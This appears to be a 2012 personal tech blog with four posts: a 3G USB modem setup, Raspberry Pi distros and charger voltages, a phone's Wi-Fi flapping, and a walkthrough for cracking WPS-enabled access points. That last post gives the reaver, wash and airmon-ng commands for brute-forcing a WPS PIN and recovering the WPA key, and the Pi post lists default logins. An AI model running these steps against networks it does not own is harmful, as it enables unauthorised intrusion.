Telstra3G USB in Linux

23 06 2012

Telstra 3G USB Dongles are good for connectivity on the go.

root@bt:~# lsusb | grep ZTE
Bus 001 Device 005: ID 19d2:0031 ONDA Communication S.p.A. ZTE MF110/MF636

root@bt:~# dmesg | grep ttyUSB
[ 2306.101269] usb 1-4: GSM modem (1-port) converter now attached to ttyUSB0
[ 2306.101613] usb 1-4: GSM modem (1-port) converter now attached to ttyUSB1
[ 2306.102140] usb 1-4: GSM modem (1-port) converter now attached to ttyUSB2
[ 2306.102487] usb 1-4: GSM modem (1-port) converter now attached to ttyUSB3

There is a hard way using wvdial etc – or an easy way. I chose the easy way – a great little script called sakis3g


wget “”
gunzip sakis3g.gz
chmod +x sakis3g
./sakis3g –interactive


root@bt:~/scripts# ./sakis3g connect USBINTERFACE=”3″ APN=”telstra.internet”

root@bt:~/scripts# ./sakis3g connect info
MF626s connected to Telstra (50501).
Connection Information

Interface: P-t-P (ppp0)

Connected since: 2012-06-11 20:52
Kilobytes received: 376
Kilobytes sent: 57

Network ID: 50501
Operator name: Telstra
APN: telstra.internet

Modem: MF626s
Modem type: USB
Kernel driver: option
Device: /dev/ttyUSB2

IP Address:
Subnet Mask:
Peer IP Address:
Default route(s):

root@bt:~/scripts# ./sakis3g disconnect

My Raspberry Pi comes to life

16 06 2012

Like most of the rest of the world’s IT population, I got excited about the Pi & ordered one.

It has arrived & I have had a little bit of time to play with it & I am pretty impressed.


The first thing to do was a case, I didnt want to short it out on anything & it just felt too fragile & vulnerable naked

I printed this one ( on some card (manila folder) & folded it up


A larger selection can be found here:


Next we need a Distro:

For each image, just use dd in Linux **Be Careful – make sure you have the right device to write the image to. This would be the SD card, not your hard drive !!

dd if=.img of=/dev/sdb

I have been primarily playing with the Debian Squeeze distro
User: pi / raspberry

Raspbian is based on Debian Wheezy, which is newer than Squeeze
User: root / raspbian

The developing Raspbmc (XBMC) looks very promising – I have watched a couple of movies with it, with no performance issues

Note: you need at least a 2GB SD card. Raspbmc will use the full size of your card.

**First boot needs internet (ethernet cable/ dhcp) – the installer prepares the sdcard, then raspbmc is downloaded & setup at first boot.


The Pi runs on 5v, connected via Micro USB – which can be supplied by pretty much any phone charger / USB port these days. The only recommendation provided by the vendor is choose a supply that will provide 5v and ~700mA. They will apparently run “stable” on any voltage between  4.75 and 5.25 volts.

Many people have been using the iPhone / iPad chargers without any issues (me included). But as an experiment, I decided to see what they were putting out. The Pi has two test ports TP1 & TP2 – these are to check the voltage being supplied to the board. There are mutterings about voltages under 5volt providing unexpected behavior on some boards.

I found that my white iPhone/iPod power supply (Rated @ 5V 1A dropped to about 4.8v when the Pi is running with HDMI, SD Card & USB WiFi Dongle.

Apple (A1205) Drops to about 4.8V under load

My HTC charger (Rated @ 5V 1A)performed about the same – around 4.8v under load

HTC (TC P300) Drops to around 4.8V under load

Another generic branded “Switching power supply” that was also rated @ 5V 1A showed the same voltage drop to around 4.8V under load.

Enter the Samsung Galaxy Tab 5V 2A charger, this bad boy kept me running at 5V under load.

Samsung (ETA-P10X) Keeps pushing 5V under load

The general consensus is that a 5V 1A phone charger should be fine, but if you are planning on plugging things into the USB port (WiFi / Storage etc) then you would be probably best off getting a higher rated PSU. I am going to check out Jaycar for a regulated 5V 2A supply next. Your results may vary, I didnt experience any strange issues or performance problems when running of any of the listed PSUs – but possibly got more interface drops on the USB WiFi adapter (thats a subject for another blog post).

On the subject of power – having such a tiny / portable device is much more useful when you can take it with you away from a power point. From our local Aldi store, I picked up a “Tevion MPP 7400” This is a portable 7400mAh Li-Po Battery Pack. This little guy has two USB ports on it & will apparently provide up to 2.1A on one, or 1A each with both in use. Its primarily aimed at charging a smartphone on the go, but it works beautifully as a portable power supply for the Pi. I have not tested how long it will keep the Pi running, but I was playing on it for several hours without the pack dropping an LED on the power meter.

Battery Pack – providing 4.78V under load – just within the allowable range – so far no problems, but we will see how it goes.

Well, that’s it for now, my Pi lives and breathes (as much as a piece of electronic equipment can) – time to try out some more distros & “projects” with it.

holy flapping mobile wireless batman

27 02 2012

I had been seeing more & more 10.x.x.x addresses blocked in my FW logs hitting the inside interface. The address range on my inside network is – so naturally I was concerned & wanted to know what the hell it was.

Digging through firewall logs, I found the MAC address of the offending device. It turned out to be my Wife’s mobile phone. Samsung Galaxy Ace.

What I saw was plenty of connections permitted on the internal address, then a couple blocked on a “random” 10.x.x.x address – followed by more on the internal address.

This cycle repeated for hours on end.

Trojan / Malware / What The ??

Using the MAC address – I checked the Assosciations to my Wireless Access point:

Sure enough, it turns out that the wireless connection is flapping like crazy. Dropping on & off my wireless network.

It drops off the network, Telstra gives it a private 10.x address

It get back on the WLAN, still transmitting on the 10.x until it gets a DHCP lease from my Access Point.

The traffic that it sends onto my wireless lan while it still has the 10.x address from Telstra is blocked – and reported.

Another mystery solved…… now to work out why its flapping so much – and not behaving like my Samsung Galaxy S2 – Associates once & is done with it (example below when I got home at 6pm)

identify & crack your WPS enabled AP

25 01 2012

##DISCLAIMER## – as usual, only use on devices you have approval for or own.

I hadn’t looked much at reaver yet – although had been following the news since it was released in Dec. Reaver allows you to brute force the WPS 8 numeric digit pin (easy setup / config feature) on a WiFi AP rather than trying to brute force the PSK. WPS is enabled by default on most newer (last few years) consumer routers to get certification.

Main tools:
– reaver (crack AP) & wash (identify AP vuln to WPS brute forcing)
– the python script (circa 2009) allows you to fingerprint the AP (Make / Model / Serial etc) that has WPS enabled

Go here & download reaver 1.4 (latest at time of writing) – don’t just apt-get install as you don’t get wash

Do the install dance on your distro (works on BT5r1)

# tar zxvf reaver-1.4.tar.gz
# ./config
# make
# make install

You can also use a fun little python script called (not to be confused with the WordPress tool) to fingerprint the AP

Step 1: Interface into monitor mode

# airmon-ng start wlan0

Step 2: Identify a WPS enabled (vulnerable) AP using wash included with reaver

# wash –i mon0

Step 3: Fingerprint with

# ./ –i mon0

Step 4: run reaver against it …… grab a coffee / lunch / sleep – can take several hours to brute force the WPS pin

# reaver -i mon0 -b -AP MAC ADDRESS- -v

This will [should] result in returning the pin & psk of the wifi router – you can simply then connect.

WPS PIN: ‘15736942’
WPA PSK: ‘somesecure&reallyl0ngpskhere’
AP SSID: ‘p0wn3d’